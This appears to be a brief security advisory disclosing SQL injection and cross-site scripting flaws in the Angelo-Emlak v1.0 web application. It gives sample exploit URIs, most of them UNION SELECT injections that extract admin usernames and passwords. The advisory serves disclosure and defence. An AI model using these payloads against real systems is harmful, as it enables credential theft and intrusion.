|
Angelo-Emlak Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues through a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URI. The following example URIs are available: http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS] http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1 http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin |
|
|
Privacy Statement |
